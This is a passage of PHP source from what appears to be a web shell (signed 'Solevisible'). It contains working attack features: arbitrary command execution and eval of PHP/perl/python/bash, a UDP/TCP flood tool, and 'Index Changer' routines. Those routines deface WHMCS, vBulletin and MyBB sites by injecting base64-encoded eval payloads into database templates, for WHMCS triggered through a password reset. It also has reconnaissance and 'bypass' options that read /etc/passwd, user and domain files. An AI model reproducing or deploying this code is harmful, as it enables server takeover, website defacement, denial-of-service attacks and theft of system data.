  3624. }
  3625. echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
  3626. break;
  3627. case 'rename':
  3628. @chdir($_POST['c']);
  3629. $alfa1_escape = addslashes($_POST["alfa1"]);
  3630. $alfa3_escape = addslashes($_POST["alfa3"]);
  3631. if(!empty($_POST['alfa3'])){
  3632. $cmd_rename = false;
  3633. if($chdir_fals&&$alfa_canruncmd){
  3634. if(_alfa_is_writable($_POST['alfa1'])){
  3635. $alfa1_escape = addslashes($alfa1_decoded);
  3636. alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
  3637. }else{
  3638. $cmd_rename = true;
  3639. }
  3640. }else{
  3641. $alfa1_escape = addslashes($_POST["alfa1"]);
  3642. }
  3643. if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
  3644. echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";d.files.innerHTML = d.files.innerHTML.replace(/\\\''.$alfa1_escape.'\\\'/g, "\''.$alfa3_escape.'\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"'.$alfa1_escape.'\"/, \'value\=\"'.$alfa3_escape.'\"\');d.files.innerHTML = d.files.innerHTML.replace(/'.$alfa1_escape.'\<\/a\>/g, "'.$alfa3_escape.'</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # '.$alfa1_escape.' # \?/, "Are You Sure For Delete # '.$alfa3_escape.' # ?");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
  3645. }
  3646. echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
  3647. break;
  3648. case 'touch':
  3649. @chdir($_POST['c']);
  3650. if( !empty($_POST['alfa3']) ) {
  3651. $time = strtotime($_POST['alfa3']);
  3652. if($time){
  3653. $touched = false;
  3654. if($chdir_fals&&$alfa_canruncmd){
  3655.     alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
  3656.     $touched = true;
  3657. }
  3658. if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
  3659. echo 'Fail!';
  3660. else
  3661. echo 'Touched!';
  3662. } else echo 'Bad time format!';
  3663. }
  3664. clearstatcache();
  3665. echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
  3666. break;
  3667. case 'image':
  3668. @chdir($_POST['c']);
  3669. echo('<hr>');
  3670. $file = $_POST['alfa1'];
  3671. $image_info = @getimagesize($file);
  3672. if(is_array($image_info)||$chdir_fals){
  3673. $width = (int)$image_info[0];
  3674. $height = (int)$image_info[1];
  3675. if($chdir_fals&&$alfa_canruncmd){
  3676.     $source = alfaEx("cat '".addslashes($file)."' | base64");
  3677.     list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
  3678.     $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
  3679.     $image_info['mime'] = $mime[1];
  3680. }else{
  3681.     $source = __ZW5jb2Rlcg(__read_file($file, false));
  3682. }
  3683. $image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
  3684. if($width > 800){$width = 800;}
  3685. echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
  3686. }
  3687. break;
  3688. }
  3689. echo '</div>';
  3690. alfaFooter();
  3691. }
  3692. function findicon($file,$type){
  3693. $s = 'http://solevisible.com/icons/';
  3694. $types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
  3695. if($type!='file'){
  3696. return ($file=='..'?$s.'back.png':$s.'folder.png');
  3697. }else{
  3698. $ext = explode('.',$file);
  3699. $ext = end($ext);
  3700. $ext = strtolower($ext);
  3701. return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
  3702. }
  3703. }
  3704. function alfadlfile(){
  3705. if(isset($_POST['c'],$_POST['file'])){
  3706. $basename = rawurldecode(basename($_POST['file']));
  3707. $_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
  3708. $alfa_canruncmd = _alfa_can_runCommand(true,true);
  3709. if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
  3710. ob_start("ob_gzhandler", 4096);
  3711. header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
  3712. header("Content-Type: application/octet-stream");
  3713. if(isset($GLOBALS["glob_chdir_false"])){
  3714.     $randname = $basename.rand(111,9999);
  3715.     $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
  3716.     $filepath = $scriptpath."/".$randname;
  3717.     if(_alfa_is_writable($scriptpath)){
  3718.         alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
  3719.         readfile($filepath);
  3720.         @unlink($filepath);
  3721.     }else{
  3722.         alfaEx("cat '".addslashes($_POST["file"])."'");
  3723.     }
  3724. }else{
  3725.     readfile($_POST['file']);
  3726. }
  3727. }else echo('Error...!');}}
  3728. function alfaphpeval(){
  3729. alfahead();
  3730. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
  3731. echo '<div class=header>';
  3732. ob_start();
  3733. $INI=ini_get_all();
  3734. print '<table border=0><tr>'
  3735. .'<td class="listing"><font class="highlight_txt">Param</td>'
  3736. .'<td class="listing"><font class="highlight_txt">Global value</td>'
  3737. .'<td class="listing"><font class="highlight_txt">Local Value</td>'
  3738. .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
  3739. foreach ($INI as $param => $values)
  3740. print "\n".'<tr>'
  3741. .'<td class="listing"><b>'.$param.'</td>'
  3742. .'<td class="listing">'.$values['global_value'].' </td>'
  3743. .'<td class="listing">'.$values['local_value'].' </td>'
  3744. .'<td class="listing">'.$values['access'].' </td></tr>';
  3745. $tmp = ob_get_clean();
  3746. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
  3747. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  3748. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
  3749. }
  3750. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
  3751. echo '<div class=header><style>.p {color:#000;}</style>';
  3752. ob_start();
  3753. phpinfo();
  3754. $tmp = ob_get_clean();
  3755. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
  3756. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  3757. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
  3758. }
  3759. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
  3760. echo '<div class=header>';
  3761. ob_start();
  3762. $EXT=get_loaded_extensions();
  3763. echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
  3764. echo '</div><br>';
  3765. }
  3766. $lang_html = "";
  3767. foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
  3768. echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
  3769. echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  3770. if(!empty($_POST['alfa1'])){
  3771. if($_POST['alfa3']=="php"){
  3772. ob_start();
  3773. eval($_POST['alfa1']);
  3774. $result = htmlspecialchars(ob_get_clean());
  3775. }elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
  3776.     if(isset($_SESSION["eval_tmpdir"])){
  3777.         $tempdir = $_SESSION["eval_tmpdir"];
  3778.     }else{
  3779.         $tempdir = dirname(alfaEx("mktemp"));
  3780.         $_SESSION["eval_tmpdir"] = $tempdir;
  3781.     }
  3782.     $lang = $_POST['alfa3'];
  3783.     $filename = "temp".rand(11111,99999);
  3784.     $temp = $tempdir."/".$filename ;
  3785.     __write_file($filename, $_POST['alfa1']);
  3786.     $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
  3787.     @unlink($filename);
  3788.     @unlink($temp);
  3789. }
  3790. echo '<textarea class=bigarea id="PhpCode">'.$result.'</textarea>';
  3791. }
  3792. echo '</pre></div>';
  3793. alfafooter();
  3794. }
  3795. function alfahash(){
  3796. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  3797. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  3798. $stringTools = array(
  3799. 'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
  3800. 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
  3801. 'strrev ( $string )' => 'strrev($s)',
  3802. 'bin2hex ( $string )' => 'bin2hex($s)',
  3803. 'hex2bin ( $string )' => 'hex2bin($s)',
  3804. 'md5 ( $string )' => 'md5($s)',
  3805. 'sha1 ( $string )' => 'sha1($s)',
  3806. 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
  3807. 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
  3808. 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
  3809. 'crypt ( $string )' => 'crypt($s)',
  3810. 'crc32 ( $string )' => 'crc32($s)',
  3811. 'str_rot13 ( $string )' => 'str_rot13($s)',
  3812. 'urlencode ( $string )' => 'urlencode($s)',
  3813. 'urldecode  ( $string )' => 'urldecode($s)',
  3814. 'full_urlencode  ( $string )' => 'full_urlencode($s)',
  3815. 'htmlspecialchars  ( $string )' => 'htmlspecialchars($s)',
  3816. 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
  3817. 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
  3818. 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
  3819. 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
  3820. 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
  3821. 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
  3822. );
  3823. alfahead();
  3824. echo '<div class=header>';
  3825. echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
  3826. foreach($stringTools as $k => $v)
  3827. echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
  3828. echo "</select> <input type='submit' value=' '/><br><textarea  name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
  3829. if(!empty($_POST['alfa1'])){
  3830. $string = addslashes($_POST['alfa2']);
  3831. $string = str_replace('\"','"',$string);
  3832. $alg = $_POST['alfa1'];
  3833. $code = str_replace('$s',"'".$string."'",$alg);
  3834. ob_start();
  3835. eval('echo '.$code.';');
  3836. $res = ob_get_contents();
  3837. ob_end_clean();
  3838. if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';
  3839. }
  3840. echo "</div>";
  3841. alfaFooter();
  3842. }
  3843. function alfados(){
  3844. alfahead();
  3845. echo '<div class=header>';
  3846. echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
  3847. if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
  3848. echo __pre();
  3849. $packets=0;
  3850. ignore_user_abort(true);
  3851. $exec_time=(int)$_POST['alfa2'];
  3852. $time=time();
  3853. $max_time=$exec_time+$time;
  3854. $host=$_POST['alfa1'];
  3855. $port=(int)$_POST['alfa3'];
  3856. $method=$_POST['alfa4'];
  3857. $out = str_repeat('X',65000);
  3858. while(1){
  3859. $packets++;
  3860. if(time() > $max_time){
  3861. break;
  3862. }
  3863. $fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
  3864. if($fp){
  3865. fwrite($fp, $out);
  3866. fclose($fp);
  3867. }
  3868. }
  3869. echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
  3870. echo "</pre>";
  3871. }
  3872. echo '</div>';
  3873. alfafooter();
  3874. }
  3875. function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
  3876. function alfaIndexChanger(){
  3877. alfahead();
  3878.  
  3879. echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
  3880. if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
  3881. echo __pre();
  3882.  
  3883. echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
  3884. <p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
  3885. ";
  3886. $table = array('td1' =>
  3887.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3888.  'td2' =>
  3889.  array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
  3890.  'td3' =>
  3891.  array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
  3892.  'td4' =>
  3893.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3894.  'td5' =>
  3895.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3896.  'td6' =>
  3897.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  3898. );
  3899. create_table($table);
  3900. echo "<br><div class='txtfont'>| Your Index |</div><br>
  3901. <textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
  3902. <input type='submit' value=' '>
  3903. </form></center></center>";
  3904. if(isset($_POST['alfa6'])){
  3905. $s0levisible="Powered By Solevisible";
  3906. $dbu = $_POST['alfa6'];
  3907. $path = $_POST['alfa5'];
  3908. $fname = $_POST['alfa4'];
  3909. $dbn = $_POST['alfa7'];
  3910. $dbp = $_POST['alfa8'];
  3911. $dbh = $_POST['alfa9'];
  3912. $index = $_POST['alfa10'];
  3913. $index = str_replace("\'","'",$index);
  3914. $deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
  3915. $saveData = __ZW5jb2Rlcg($deface);
  3916. $Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
  3917. if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
  3918. $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  3919. $soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
  3920. $soleGet = mysqli_fetch_assoc($soleSave);
  3921. $tempSave1 = $soleGet['message'];
  3922. $tempSave = str_replace("'","\'",$tempSave1);
  3923. $inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
  3924. $result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
  3925. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
  3926. $result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
  3927. if(function_exists('curl_version')){
  3928. $AlfaSole = new AlfaCURL(true);
  3929. $saveurl = $AlfaSole->Send($path."/pwreset.php");
  3930. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
  3931. $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
  3932. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
  3933. $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
  3934. __alert('File Created...');
  3935. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
  3936. }else{
  3937. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
  3938. }}}}
  3939. if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
  3940. echo __pre();
  3941.  
  3942. echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
  3943. <p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
  3944. ";
  3945. $table = array('td1' =>
  3946.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3947.  'td2' =>
  3948.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3949.  'td3' =>
  3950.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3951.  'td4' =>
  3952.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  3953.  'td5' =>
  3954.  array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
  3955. );
  3956. create_table($table);
  3957. echo "<br><div class='txtfont'>| Your Index |</div><br>
  3958. <textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
  3959. <input type='submit' value=' '></form></center></center>";
  3960. if($_POST['alfa8']=='>>'){
  3961. $s0levisible="Powered By Solevisible";
  3962. $dbu = $_POST['alfa2'];
  3963. $dbn = $_POST['alfa3'];
  3964. $dbp = $_POST['alfa4'];
  3965. $dbh = $_POST['alfa5'];
  3966. $index = $_POST['alfa6'];
  3967. $prefix = $_POST['alfa7'];
  3968. $index=str_replace("\'","'",$index);
  3969. $set_index = "{\${eval(base64_decode(\'";
  3970. $set_index .= __ZW5jb2Rlcg("echo \"$index\";");
  3971. $set_index .= "\'))}}{\${exit()}}";
  3972. if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
  3973. $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  3974. $loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
  3975. $loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
  3976. $loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
  3977. @mysqli_query($conn,$loli1) or die (mysqli_error($conn));
  3978. @mysqli_query($conn,$loli2) or die (mysqli_error($conn));
  3979. @mysqli_query($conn,$loli3) or die (mysqli_error($conn));
  3980. __alert('VB index changed...!');
  3981. }
  3982. }
  3983. }
  3984. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
  3985. echo __pre();
  3986.  
  3987. echo "<center><center><div class='txtfont_header'>| Mybb |</div>
  3988. <p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
  3989. ";
  3990. $table = array('td1' =>
  3991.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3992.  'td2' =>
  3993.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3994.  'td3' =>
  3995.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3996.  'td4' =>
  3997.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  3998. );
  3999. create_table($table);
  4000. echo "<br><div class='txtfont'>| Your Index |</div><br>
  4001. <textarea name=mybbindex rows='19' cols='103'>
  4002. <title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
  4003. if(isset($_POST['alfa6'])){
  4004. $mybb_dbh = $_POST['alfa6'];
  4005. $mybb_dbu = $_POST['alfa7'];
  4006. $mybb_dbn = $_POST['alfa8'];
  4007. $mybb_dbp = $_POST['alfa9'];
  4008. $mybb_index = $_POST['alfa10'];
  4009. if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
  4010. $conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
  4011. $prefix="mybb_";
  4012. $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
  4013. $result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
  4014. __alert('MyBB index changed...!');
  4015. }
  4016. }
  4017. }
  4018. echo "</div>";
  4019. alfafooter();
  4020. }
  4021. function alfaproc()
  4022. {
  4023. alfahead();
  4024. echo "<Div class=header><br><center>";
  4025. if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
  4026. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  4027. if($GLOBALS['sys']=="win"){
  4028. $process=array(
  4029. "Task List" =>"tasklist /V",
  4030. "System Info" =>"systeminfo",
  4031. "Active Connections" => "netstat -an",
  4032. "Running Services" => "net start",
  4033. "User Accounts" => "net user",
  4034. "Show Computers" => "net view",
  4035. "ARP Table" => "arp -a",
  4036. "IP Configuration" => "ipconfig /all"
  4037. );}else{
  4038. $process=array(
  4039. "Process status" => "ps aux",
  4040. "Syslog" =>"cat /etc/syslog.conf",
  4041. "Resolv" => "cat /etc/resolv.conf",
  4042. "Hosts" =>"cat /etc/hosts",
  4043. "Cpuinfo"=>"cat /proc/cpuinfo",
  4044. "Version"=>"cat /proc/version",
  4045. "Sbin"=>"ls -al /usr/sbin",
  4046. "Interrupts"=>"cat /proc/interrupts",
  4047. "lsattr"=>"lsattr -va",
  4048. "Uptime"=>"uptime",
  4049. "Fstab" =>"cat /etc/fstab"
  4050. );}
  4051. foreach($process as $n => $link){
  4052. echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
  4053. }
  4054. echo "</center><br>";
  4055. if(!empty($_POST['alfa1'])){
  4056. echo "<pre class='ml1' style='margin-top:5px' >";
  4057. if(isset($GLOBALS["glob_chdir_false"])&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
  4058. echo alfaEx($cmd.$_POST['alfa1']);
  4059. echo '</pre>';
  4060. }
  4061. echo "</div>";
  4062. alfafooter();
  4063. }
  4064. function alfasafe(){
  4065. alfahead();
  4066. echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
  4067. echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
  4068. if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
  4069. if(!_alfa_file_exists("/etc/virtual/domainowners")){
  4070. echo __pre();
  4071. $solevisible9 = _alfa_file('/etc/named.conf');
  4072. if(is_array($solevisible9)){
  4073. foreach($solevisible9 as $solevisible13){
  4074. if(@eregi('zone',$solevisible13)){
  4075. preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
  4076. if(strlen(trim($solevisible14[1][0])) > 2){
  4077. echo $solevisible14[1][0].'<br>';
  4078. }}}
  4079. }
  4080. }else{
  4081. echo __pre();
  4082. $users = _alfa_file("/etc/virtual/domainowners");
  4083. if(is_array($users)){
  4084. foreach($users as $boz){
  4085. $dom = explode(":",$boz);
  4086. echo $dom[0]."\n";}}}}
  4087. if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
  4088. echo '
